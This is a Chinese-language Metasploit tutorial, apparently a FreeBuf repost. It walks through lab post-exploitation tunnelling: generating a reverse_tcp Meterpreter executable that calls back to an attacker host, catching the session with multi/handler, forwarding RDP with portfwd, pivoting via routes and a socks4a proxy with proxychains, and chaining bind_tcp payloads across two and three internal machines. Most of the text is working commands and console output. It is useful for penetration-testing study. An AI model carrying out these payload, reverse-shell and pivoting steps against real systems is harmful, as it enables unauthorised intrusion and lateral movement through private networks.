Metasploit滲透技巧:后滲透Meterpreter代理
作者:kboron
Metasploit是一個免費的、可下載的滲透測試框架,通過它可以很容易地獲取、開發(fā)并對計算機軟件漏洞實施攻擊測試。它本身附帶數百個已知軟件漏洞的專業(yè)級漏洞攻擊測試工具。
Metasploit是一個免費的、可下載的滲透測試框架,通過它可以很容易地獲取、開發(fā)并對計算機軟件漏洞實施攻擊測試。它本身附帶數百個已知軟件漏洞的專業(yè)級漏洞攻擊測試工具。
當H.D. Moore在2003年發(fā)布Metasploit時,計算機安全狀況也被永久性地改變了。仿佛一夜之間,任何人都可以成為黑客,每個人都可以使用攻擊工具來測試那些未打過補丁或者剛剛打過補丁的漏洞。
正是因為Metasploit團隊一直都在努力開發(fā)各種攻擊測試工具,并將它們貢獻給所有Metasploit用戶,軟件廠商再也不能推遲發(fā)布針對已公布漏洞的補丁了。
本文將科普下metasploit隧道代理的使用技巧。
0×00 獲取meterpreter
1.首先生成可執(zhí)行文件
- root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.101.105 LPORT=444 X > meter.exe
- [!] ************************************************************************
- [!] * The utility msfpayload is deprecated! *
- [!] * It will be removed on or about 2015-06-08 *
- [!] * Please use msfvenom instead *
- [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
- [!] ************************************************************************
- Created by msfpayload (http://www.metasploit.com).
- Payload: windows/meterpreter/reverse_tcp
- Length: 281
- Options: {"LHOST"=>"192.168.101.105", "LPORT"=>"444"}
2.啟動msfconsole,監(jiān)聽反連端口
- root@kali:~# msfconsole
- [*] Starting the Metasploit Framework console.../
- Taking notes in notepad? Have Metasploit Pro track & report
- your progress and findings -- learn more on http://rapid7.com/metasploit
- =[ metasploit v4.11.0-2014122301 [core:4.11.0.pre.2014122301 api:1.0.0]]
- + -- --=[ 1386 exploits - 863 auxiliary - 236 post ]
- + -- --=[ 342 payloads - 37 encoders - 8 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- msf > use exploit/multi/handler
- msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
- PAYLOAD => windows/meterpreter/reverse_tcp
- msf exploit(handler) > set LHOST 0.0.0.0
- LHOST => 0.0.0.0
- msf exploit(handler) > set LPORT 444
- LPORT => 444
- msf exploit(handler) > show options
- Module options (exploit/multi/handler):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- Payload options (windows/meterpreter/reverse_tcp):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
- LHOST 0.0.0.0 yes The listen address
- LPORT 444 yes The listen port
- Exploit target:
- Id Name
- -- ----
- 0 Wildcard Target
- msf exploit(handler) > run
- [*] Started reverse handler on 0.0.0.0:444
- [*] Starting the payload handler...
3.在xp-test1執(zhí)行meter.exe,attacker獲得meterperter
- msf exploit(handler) > run
- [*] Started reverse handler on 0.0.0.0:444
- [*] Starting the payload handler...
- [*] Sending stage (770048 bytes) to 192.168.101.107
- [*] Meterpreter session 1 opened (192.168.101.105:444 -> 192.168.101.107:48019) at 2015-01-11 12:49:11 +0800
- meterpreter > ipconfig
- Interface 1
- ============
- Name : MS TCP Loopback interface
- Hardware MAC : 00:00:00:00:00:00
- MTU : 1520
- IPv4 Address : 127.0.0.1
- Interface 2
- ============
- Name : AMD PCNET Family PCI Ethernet Adapter - pencS
- Hardware MAC : 00:0c:29:ed:cf:d0
- MTU : 1500
- IPv4 Address : 10.1.1.128
- IPv4 Netmask : 255.255.255.0
#p#
0×01 meterpreter基本隧道代理
好,現在已經有一個反彈回來的權限,下面介紹meterpreter隧道代理的幾種方法
1.portfwd
portfwd 是meterpreter提供的一種基本的端口轉發(fā)。porfwd可以反彈單個端口到本地,并且監(jiān)聽.使用方法如下:
- meterpreter > portfwd
- 0 total local port forwards.
- meterpreter > portfwd -h
- Usage: portfwd [-h] [add | delete | list | flush] [args]
- OPTIONS:
- -L <opt> The local host to listen on (optional).
- -h Help banner.
- -l <opt> The local port to listen on.
- -p <opt> The remote port to connect to.
- -r <opt> The remote host to connect to.
使用實例介紹:
反彈10.1.1.129端口3389到本地2222并監(jiān)聽那么可以使用如下方法:
- meterpreter > portfwd add -l 2222 -r 10.1.1.129 -p 3389
- [*] Local TCP relay created: 0.0.0.0:2222 <-> 10.1.1.129:3389
- meterpreter > portfwd
- 0: 0.0.0.0:2222 -> 10.1.1.129:3389
- 1 total local port forwards.
已經轉發(fā)成功,下面來驗證下:
- root@kali:~# netstat -an | grep "2222"
- tcp 0 0 0.0.0.0:2222 0.0.0.0:* LISTEN
可以看到已經成功監(jiān)聽2222端口
接著連接本地2222端口即可連接受害機器10.1.1.129 3389端口,如下:
- root@kali:~# rdesktop 127.1.1.0:2222
可以看到,已經成功連接到10.1.1.129 的3389端口#p#
2. pivot
pivot是meterpreter最常用的一種代理,可以輕松把你的機器代理到受害者內網環(huán)境,下面介紹下pivot的搭建和使用方法
使用方法route add 目標i或ip段 Netmask 要使用代理的會話,通過實例來說明:
在metasploit添加一個路由表,目的是訪問10.1.1.129將通過meterpreter的會話 1 來訪問:
- msf exploit(handler) > route add 10.1.1.129 255.255.255.255 1
- [*] Route added
- msf exploit(handler) > route print
- Active Routing Table
- ====================
- Subnet Netmask Gateway
- ------ ------- -------
- 10.1.1.129 255.255.255.255 Session 1
這里如果要代理10.1.1.129/24 到session 1,則可以這么寫
- route add 10.1.1.0 255.255.255.0 1
到這里pivot已經配置好了,你在msf里對10.1.1.129進行掃描(db_nmap)或者訪問(psexe 模塊,ssh模塊等)將通過代理session 1這個會話來訪問。
如果想通過其他應用程序來使用這個代理怎么辦呢,這時候可以借助 metasploit socks4a提供一個監(jiān)聽隧道供其他應用程序訪問:
首先使用 socks4a并且配置,監(jiān)聽端口
- msf exploit(handler) > use auxiliary/server/socks4a
- msf auxiliary(socks4a) > show options
- Module options (auxiliary/server/socks4a):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- SRVHOST 0.0.0.0 yes The address to listen on
- SRVPORT 1080 yes The port to listen on.
- Auxiliary action:
- Name Description
- ---- -----------
- Proxy
- msf auxiliary(socks4a) > exploit -y
- [*] Auxiliary module execution completed
- msf auxiliary(socks4a) >
- [*] Starting the socks4a proxy server
查看監(jiān)聽端口
- root@kali:~# netstat -an | grep "1080"
- tcp 0 0 0.0.0.0:1080 0.0.0.0:* LISTEN
端口已經監(jiān)聽,接著配置 proxychains
- root@kali:~# vim /etc/proxychains.conf
- [ProxyList]
- # add proxy here ...
- # meanwileroot@kali:~# netstat -an | grep "1080"
- tcp 0 0 0.0.0.0:1080 0.0.0.0:* LISTEN
- # defaults set to "tor"
- socks4 127.0.0.1 1080
配置好以后看看使用 proxychains進行代理訪問,這里訪問10.1.1.129 3389端口
可以看到已經成功訪問#p#
0×02 多級代理
1. 二級代理隧道
上面介紹了meterpreter基礎的代理方法,但是有些實際環(huán)境不能直接使用,考慮如下環(huán)境(內網機器A、B。A機器可以對外連接,但是訪問控制很嚴格,只能訪問到很少的內網機器,B機器不能對外連接,但是可以訪問到很多核心服務和機器,A、B之間可以互相訪問),如果我們想通過B機器對核心服務和機器進行掃描和訪問要怎么辦呢?
這時候我們就meterpreter的pivot組合輕松實現二級代理就可以
效果示意圖:attacker->xp-test1->xp-test2
首先接著上面,我們已經有一個xp-test1反彈回來的meterprter了,接著我們生成一個正向的執(zhí)行文件
- root@kali:~# msfpayload windows/meterpreter/bind_tcp RHOST=0.0.0.0 RPORT=4444 X > Rmeter.exe
- [!] ************************************************************************
- [!] * The utility msfpayload is deprecated! *
- [!] * It will be removed on or about 2015-06-08 *
- [!] * Please use msfvenom instead *
- [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
- [!] ************************************************************************
- Created by msfpayload (http://www.metasploit.com).
- Payload: windows/meterpreter/bind_tcp
- Length: 285
- Options: {"RHOST"=>"0.0.0.0", "RPORT"=>"4444"}
生成好以后在xp-test2上面運行
接著在msf里面添加路由
- msf exploit(handler) > route add 10.1.1.129 255.255.255.255 2
- [*] Route added
- msf exploit(handler) > route print
- Active Routing Table
- ====================
- Subnet Netmask Gateway
- ------ ------- -------
- 10.1.1.129 255.255.255.255 Session 2
連接正向 meterpreter獲取權限
- msf exploit(handler) > use exploit/multi/handler
- msf exploit(handler) > set PAYLOAD windows//bind_tcp
- PAYLOAD => windows/meterpreter/bind_tcp
- msf exploit(handler) > set RHOST 10.1.1.129
- RHOST => 10.1.1.129
- msf exploit(handler) > show options
- Module options (exploit/multi/handler):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- Payload options (windows/meterpreter/bind_tcp):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
- LPORT 444 yes The listen port
- RHOST 10.1.1.129 no The target address
- Exploit target:
- Id Name
- -- ----
- 0 Wildcard Target
- msf exploit(handler) > set LPORT 4444
- LPORT => 4444
- msf exploit(handler) > show options
- Module options (exploit/multi/handler):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- Payload options (windows/meterpreter/bind_tcp):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
- LPORT 4444 yes The listen port
- RHOST 10.1.1.129 no The target address
- Exploit target:
- Id Name
- -- ----
- 0 Wildcard Target
- msf exploit(handler) > run
- [*] Started bind handler
- [*] Starting the payload handler...
- [*] Sending stage (770048 bytes)
- [*] Meterpreter session 3 opened (192.168.101.105-192.168.101.107:0 -> 10.1.1.129:4444) at 2015-01-11 13:34:37 +0800
現在已經獲取到xp-test2的權限,注意這里是通過xp-test1 pivot代理
下面來驗證下,查看xp-test2 4444端口
- C:\Documents and Settings\Administrator>netstat -an | find "4444"
- TCP 10.1.1.129:4444 10.1.1.128:1051 ESTABLISHED
是通過xp-test1進行連接的。
這時候二級代理已經搭建好了,你可以添加需要訪問的ip到路由表,通過第二層的session(session 3),就可以使用metaploit的其他模塊訪問或掃描了。#p#
2.三級或多級代理
有時候過于龐大或者復雜的內網環(huán)境,甚至需要三層或者多層代理,原理與兩層相似,通過在第二層代理的基礎上進行連接既可
示意圖:attacket->xp-test1->xp-test2->xp-test3->…..
與兩層代理類似,如下實現:
- msf exploit(handler) > sessions -l
- Active sessions
- ===============
- Id Type Information Connection
- -- ---- ----------- ----------
- 2 meterpreter x86/win32 XP-TEST1\Administrator @ XP-TEST1 192.168.101.105:444 -> 192.168.101.107:51205 (10.1.1.128)
- 4 meterpreter x86/win32 XP-TEST2\Administrator @ XP-TEST2 192.168.101.105-192.168.101.107:0 -> 10.1.1.129:4444 (10.1.1.129)
- msf exploit(handler) > route add 10.1.1.131 4
- [-] Missing arguments to route add.
- msf exploit(handler) > route add 10.1.1.131 255.255.255.255 4
- [*] Route added
- msf exploit(handler) > route print
- Active Routing Table
- ====================
- Subnet Netmask Gateway
- ------ ------- -------
- 10.1.1.129 255.255.255.255 Session 2
- 10.1.1.131 255.255.255.255 Session 4
- msf exploit(handler) > set RHOST=10.1.1.131
- [-] Unknown variable
- Usage: set [option] [value]
- Set the given option to value. If value is omitted, print the current value.
- If both are omitted, print options that are currently set.
- If run from a module context, this will set the value in the module's
- datastore. Use -g to operate on the global datastore
- msf exploit(handler) > set RHOST 10.1.1.131
- RHOST => 10.1.1.131
- msf exploit(handler) > show options
- Module options (exploit/multi/handler):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- Payload options (windows/meterpreter/bind_tcp):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
- LPORT 4444 yes The listen port
- RHOST 10.1.1.131 no The target address
- Exploit target:
- Id Name
- -- ----
- 0 Wildcard Target
- msf exploit(handler) > run
- [*] Started bind handler
- [*] Starting the payload handler...
- [*] Sending stage (770048 bytes)
- [*] Meterpreter session 5 opened (192.168.101.105-_1_-192.168.101.107:0 -> 10.1.1.131:4444) at 2015-01-11 13:45:53 +0800
- meterpreter > background
- [*] Backgrounding session 5...
- msf exploit(handler) > sessions -l
- Active sessions
- ===============
- Id Type Information Connection
- -- ---- ----------- ----------
- 2 meterpreter x86/win32 XP-TEST1\Administrator @ XP-TEST1 192.168.101.105:444 -> 192.168.101.107:51205 (10.1.1.128)
- 4 meterpreter x86/win32 XP-TEST2\Administrator @ XP-TEST2 192.168.101.105-192.168.101.107:0 -> 10.1.1.129:4444 (10.1.1.129)
- 5 meterpreter x86/win32 XP-TEST3\Administrator @ XP-TEST3 192.168.101.105-_1_-192.168.101.107:0 -> 10.1.1.131:4444 (10.1.1.131)
- 在xp-test3查看端口連接
- C:\Documents and Settings\Administrator>netstat -an | find "4444"
- TCP 10.1.1.131:4444 10.1.1.129:1032 ESTABLISHED
- 在xp-test2查看4444端口
- C:\Documents and Settings\Administrator>netstat -an | find "4444"
- TCP 10.1.1.129:1032 10.1.1.131:4444 ESTABLISHED
- TCP 10.1.1.129:4444 10.1.1.128:1054 ESTABLISHED
- 說明已經實現三級連接,即attacker->xp-test1->xp-test2->xp-test3
0×03 總結
最后,代理級數越多,帶寬損耗和穩(wěn)定性就會下降。滲透過程中根據實際情況自由靈活的選擇和使用代理方式才能實現事半工倍的效果。
責任編輯:藍雨淚
來源:
FreeBuf
